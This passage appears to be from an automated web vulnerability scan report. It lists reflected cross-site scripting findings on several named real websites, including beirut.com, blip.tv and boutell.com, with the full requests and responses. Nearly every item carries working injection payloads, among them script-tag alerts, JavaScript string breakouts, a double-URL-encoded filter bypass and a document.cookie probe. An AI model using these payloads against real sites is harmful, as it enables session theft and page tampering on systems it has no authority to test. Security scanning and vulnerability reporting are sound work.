Date: Tue, 25 Jan 2011 02:33:37 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script type="text/javascript">
var randstyle='purple';
var indexpage='Index';
var initfacebox='';
var contactid='310fd';alert(1)//6d9de9b9ba5';
var showfacebox='';
</script>
...[SNIP]...

4.1163. http://www.beirut.com/css/purple/images/site-top.png [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /css/purple/images/site-top.png

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 19afb%2527%253balert%25281%2529%252f%252facb23f911c6 was submitted in the REST URL parameter 3. This input was echoed as 19afb';alert(1)//acb23f911c6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css/purple/19afb%2527%253balert%25281%2529%252f%252facb23f911c6/site-top.png HTTP/1.1
Host: www.beirut.com
Proxy-Connection: keep-alive
Referer: http://www.beirut.com/css/blue/4429e%2527%253balert%2528document.cookie%2529%252f%252f59f8c7185c5/search-btn.gif
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=17jkapsd34tdtfv9m4mr30gs23

Response

HTTP/1.0 404 Not Found
Date: Tue, 25 Jan 2011 02:33:55 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script type="text/javascript">
var randstyle='purple';
var indexpage='Index';
var initfacebox='';
var contactid='19afb';alert(1)//acb23f911c6';
var showfacebox='';
</script>
...[SNIP]...

4.1164. http://www.beirut.com/images/Beirut.com.png [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /images/Beirut.com.png

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 82348'-alert(1)-'5df98ca5207 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /82348'-alert(1)-'5df98ca5207/Beirut.com.png HTTP/1.1
Host: www.beirut.com
Proxy-Connection: keep-alive
Referer: http://www.beirut.com/css/blue/4429e%2527%253balert%2528document.cookie%2529%252f%252f59f8c7185c5/search-btn.gif
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=17jkapsd34tdtfv9m4mr30gs23

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:23:45 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept
Content-Type: text/html; charset=UTF-8
Content-Length: 45037

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='magenta';
var indexpage='82348'-alert(1)-'5df98ca5207';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.1165. http://www.beirut.com/twitter [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.beirut.com
Path:   /twitter

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 350a5"><a>f49b61db3c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /twitter350a5"><a>f49b61db3c HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 06:26:36 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 64460

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<a id="submitlisting_footer" rel="facebox" href="/submitaListing.php?randstyle=magenta&indexpage=twitter350a5"><a>f49b61db3c&listingtype=twitter.php&Types=">
...[SNIP]...

4.1166. http://www.beirut.com/twitter [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /twitter

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 68e96'-alert(1)-'495919bd68e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /twitter68e96'-alert(1)-'495919bd68e HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 06:31:44 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 64475

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='magenta';
var indexpage='twitter68e96'-alert(1)-'495919bd68e';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.1167. http://www.beneteaucountdown.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beneteaucountdown.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c06cc"><script>alert(1)</script>74390de796f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c06cc\"><script>alert(1)</script>74390de796f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?c06cc"><script>alert(1)</script>74390de796f=1 HTTP/1.1
Host: www.beneteaucountdown.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 13:12:54 GMT
Server: Apache
X-Powered-By: PHP/5.2.10
Set-Cookie: PHPSESSID=d522a64ff7164ef426aa4dd2ee10c3d4; path=/
Expires:
Cache-Control:
Pragma:
Set-Cookie: BBF_Login=deleted; expires=Mon, 25-Jan-2010 13:12:53 GMT
Connection: close
Content-Type: text/html; charset=windows-1252
Content-Length: 21898

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<form name="BrochureRequest" action="index.php?c06cc\"><script>alert(1)</script>74390de796f=1&amp;ccsForm=BrochureRequest" method="post">
...[SNIP]...

4.1168. http://www.blip.tv/posts [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.blip.tv
Path:   /posts

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 33eee'%3balert(1)//bfd09d4ad71 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 33eee';alert(1)//bfd09d4ad71 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /posts?33eee'%3balert(1)//bfd09d4ad71=1 HTTP/1.1
Host: www.blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Cookie
X-otter-skin: blipnew
Set-Cookie: tab_state=blog; domain=.blip.tv; path=/; expires=Tue, 08-Feb-2011 13:13:59 GMT
Set-Cookie: tab_state=blog; domain=.blip.tv; path=/; expires=Tue, 08-Feb-2011 13:13:59 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 52451
Date: Tue, 25 Jan 2011 13:13:59 GMT
X-Varnish: 2104821284
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>    
   
...[SNIP]...
<script type="text/javascript">
   
       
                       window.rss_feed_url = 'http://blip.tv/rss?sort=popularity;page=1;date=dayago;33eee';alert(1)//bfd09d4ad71=1;category=;s=posts';
           window.generic_feed_uri = 'sort=popularity;page=1;date=dayago;33eee\';alert(1)//bfd09d4ad71=1;category=;s=posts';
           
       
   </script>
...[SNIP]...

4.1169. http://www.blip.tv/posts [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.blip.tv
Path:   /posts

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 106dd"><script>alert(1)</script>fca98f32eb9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /posts?106dd"><script>alert(1)</script>fca98f32eb9=1 HTTP/1.1
Host: www.blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Cookie
X-otter-skin: blipnew
Set-Cookie: tab_state=blog; domain=.blip.tv; path=/; expires=Tue, 08-Feb-2011 13:13:52 GMT
Set-Cookie: tab_state=blog; domain=.blip.tv; path=/; expires=Tue, 08-Feb-2011 13:13:52 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 52592
Date: Tue, 25 Jan 2011 13:13:51 GMT
X-Varnish: 1652155154
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>    
   
...[SNIP]...
<a href="/?106dd"><script>alert(1)</script>fca98f32eb9=1;sort=popularity;date=dayago;category=;s=posts;page=2">
...[SNIP]...

4.1170. http://www.blip.tv/posts/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.blip.tv
Path:   /posts/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 73be9"><script>alert(1)</script>34c636ed8b6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /posts/?73be9"><script>alert(1)</script>34c636ed8b6=1 HTTP/1.1
Host: www.blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Vary: Cookie
X-otter-skin: blipnew
Set-Cookie: tab_state=blog; domain=.blip.tv; path=/; expires=Tue, 08-Feb-2011 13:13:37 GMT
Set-Cookie: tab_state=blog; domain=.blip.tv; path=/; expires=Tue, 08-Feb-2011 13:13:37 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 52337
Date: Tue, 25 Jan 2011 13:13:37 GMT
X-Varnish: 809223008
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>    
   
...[SNIP]...
<a href="/?73be9"><script>alert(1)</script>34c636ed8b6=1;sort=popularity;date=dayago;category=;s=posts;page=2">
...[SNIP]...

4.1171. http://www.blip.tv/posts/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.blip.tv
Path:   /posts/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2098b'%3balert(1)//8bdeb242a10 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2098b';alert(1)//8bdeb242a10 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /posts/?2098b'%3balert(1)//8bdeb242a10=1 HTTP/1.1
Host: www.blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Cookie
X-otter-skin: blipnew
Set-Cookie: tab_state=blog; domain=.blip.tv; path=/; expires=Tue, 08-Feb-2011 13:13:49 GMT
Set-Cookie: tab_state=blog; domain=.blip.tv; path=/; expires=Tue, 08-Feb-2011 13:13:49 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 52451
Date: Tue, 25 Jan 2011 13:13:49 GMT
X-Varnish: 280784971
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>    
   
...[SNIP]...
<script type="text/javascript">
   
       
                       window.rss_feed_url = 'http://blip.tv/rss?sort=popularity;2098b';alert(1)//8bdeb242a10=1;page=1;date=dayago;category=;s=posts';
           window.generic_feed_uri = 'sort=popularity;2098b\';alert(1)//8bdeb242a10=1;page=1;date=dayago;category=;s=posts';
           
       
   </script>
...[SNIP]...

4.1172. http://www.blip.tv/users [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.blip.tv
Path:   /users

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7a9ae"><script>alert(1)</script>78c3b3600ff was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /users?7a9ae"><script>alert(1)</script>78c3b3600ff=1 HTTP/1.1
Host: www.blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Vary: Cookie
X-otter-skin: blipnew
Set-Cookie: tab_state=blog; domain=.blip.tv; path=/; expires=Tue, 08-Feb-2011 13:13:57 GMT
Set-Cookie: tab_state=blog; domain=.blip.tv; path=/; expires=Tue, 08-Feb-2011 13:13:57 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 36112
Date: Tue, 25 Jan 2011 13:13:58 GMT
X-Varnish: 809224406
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>    
   
...[SNIP]...
<a href="/?7a9ae"><script>alert(1)</script>78c3b3600ff=1;sort=views;pagelen=10;s=users;page=2">
...[SNIP]...

4.1173. http://www.blip.tv/users/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.blip.tv
Path:   /users/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9199f"><script>alert(1)</script>3ecd1a1aa40 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /users/?9199f"><script>alert(1)</script>3ecd1a1aa40=1 HTTP/1.1
Host: www.blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Vary: Cookie
X-otter-skin: blipnew
Set-Cookie: tab_state=blog; domain=.blip.tv; path=/; expires=Tue, 08-Feb-2011 13:14:01 GMT
Set-Cookie: tab_state=blog; domain=.blip.tv; path=/; expires=Tue, 08-Feb-2011 13:14:01 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 36112
Date: Tue, 25 Jan 2011 13:14:02 GMT
X-Varnish: 809224607
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>    
   
...[SNIP]...
<a href="/?sort=views;9199f"><script>alert(1)</script>3ecd1a1aa40=1;pagelen=10;s=users;page=2">
...[SNIP]...

4.1174. http://www.boutell.com/lsm/lsmbyid.cgi/002057/x22 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.boutell.com
Path:   /lsm/lsmbyid.cgi/002057/x22

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 65012"><script>alert(1)</script>13d1a3fff3b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /lsm/lsmbyid.cgi/00205765012"><script>alert(1)</script>13d1a3fff3b/x22 HTTP/1.1
Host: www.boutell.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:04:39 GMT
Server: Apache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 7886

<title>Linux Software Map: Error</title>
<link href="/main.css" rel="stylesheet" type="text/css">
<!-- SEARCH-ENGINE-OFF -->
<body>
<script type="text/javascript">

var _gaq = _gaq || [];
_gaq.pus
...[SNIP]...
<a class="lmenu" href="/cgi-bin/printable.cgi?url=http://www.boutell.com/lsm/lsmbyid.cgi/00205765012"><script>alert(1)</script>13d1a3fff3b/x22">
...[SNIP]...

4.1175. http://www.boutell.com/lsm/lsmbyid.cgi/002057/x22 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.boutell.com
Path:   /lsm/lsmbyid.cgi/002057/x22

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eef8e"><script>alert(1)</script>89c9b41b94b was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /lsm/lsmbyid.cgi/002057/x22eef8e"><script>alert(1)</script>89c9b41b94b HTTP/1.1
Host: www.boutell.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:04:40 GMT
Server: Apache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 7886

<title>Linux Software Map: Error</title>
<link href="/main.css" rel="stylesheet" type="text/css">
<!-- SEARCH-ENGINE-OFF -->
<body>
<script type="text/javascript">

var _gaq = _gaq || [];
_gaq.pus
...[SNIP]...
<a class="lmenu" href="/cgi-bin/printable.cgi?url=http://www.boutell.com/lsm/lsmbyid.cgi/002057/x22eef8e"><script>alert(1)</script>89c9b41b94b">
...[SNIP]...

4.1176. http://www.boutell.com/lsm/lsmbyid.cgi/002057/x22 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.boutell.com
Path:   /lsm/lsmbyid.cgi/002057/x22

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fffc0"><script>alert(1)</script>e04eff45495 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /lsm/lsmbyid.cgi/002057/x22?fffc0"><script>alert(1)</script>e04eff45495=1 HTTP/1.1
Host: www.boutell.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:04:36 GMT
Server: Apache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 7889

<title>Linux Software Map: Error</title>
<link href="/main.css" rel="stylesheet" type="text/css">
<!-- SEARCH-ENGINE-OFF -->
<body>
<script type="text/javascript">

var _gaq = _gaq || [];
_gaq.pus
...[SNIP]...
<a class="lmenu" href="/cgi-bin/printable.cgi?url=http://www.boutell.com/lsm/lsmbyid.cgi/002057/x22?fffc0"><script>alert(1)</script>e04eff45495=1">
...[SNIP]...

4.1177. http://www.espatial.com/contact/live-trial-adwords [kw parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.espatial.com
Path:   /contact/live-trial-adwords

Issue detail

The value of the kw request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b46d4"><script>alert(1)</script>d39b1f17c61 was submitted in the kw parameter. This input was echoed as b46d4\"><script>alert(1)</script>d39b1f17c61 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /contact/live-trial-adwords?utm_source=Google&utm_medium=PPC&kw=erdas%20extensions%20for%20arcgisb46d4"><script>alert(1)</script>d39b1f17c61&utm_campaign=Competitors-Competitor_Companies/ HTTP/1.1
Host: www.espatial.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 05:07:05 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.9
X-Pingback: http://www.espatial.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 31515

<!DOCTYPE html>
<html dir="ltr" lang="en-US">
<head>
<meta charset="UTF-8" />
<title>Discover the power of GIS with web delivery | eSpatial GIS USA</title>
<meta name="google-site-verification"
...[SNIP]...
<input id="kw" name="LEADCF20" type="text" value="erdas extensions for arcgisb46d4\"><script>alert(1)</script>d39b1f17c61&#8243; />
...[SNIP]...

4.1178. http://www.espatial.com/contact/live-trial-adwords [utm_campaign parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.espatial.com
Path:   /contact/live-trial-adwords

Issue detail

The value of the utm_campaign request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d8de0"><script>alert(1)</script>e98382c987e was submitted in the utm_campaign parameter. This input was echoed as d8de0\"><script>alert(1)</script>e98382c987e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /contact/live-trial-adwords?utm_source=Google&utm_medium=PPC&kw=erdas%20extensions%20for%20arcgis&utm_campaign=Competitors-Competitor_Companies/d8de0"><script>alert(1)</script>e98382c987e HTTP/1.1
Host: www.espatial.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 05:07:30 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.9
X-Pingback: http://www.espatial.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 31515

<!DOCTYPE html>
<html dir="ltr" lang="en-US">
<head>
<meta charset="UTF-8" />
<title>Discover the power of GIS with web delivery | eSpatial GIS USA</title>
<meta name="google-site-verification"
...[SNIP]...
<input id="campaign" name="LEADCF18" type="text" value="Competitors-Competitor_Companies/d8de0\"><script>alert(1)</script>e98382c987e&#8221; />
...[SNIP]...

4.1179. http://www.espatial.com/contact/live-trial-adwords [utm_medium parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.espatial.com
Path:   /contact/live-trial-adwords

Issue detail

The value of the utm_medium request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 51199"><script>alert(1)</script>56bf2d5010f was submitted in the utm_medium parameter. This input was echoed as 51199\"><script>alert(1)</script>56bf2d5010f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

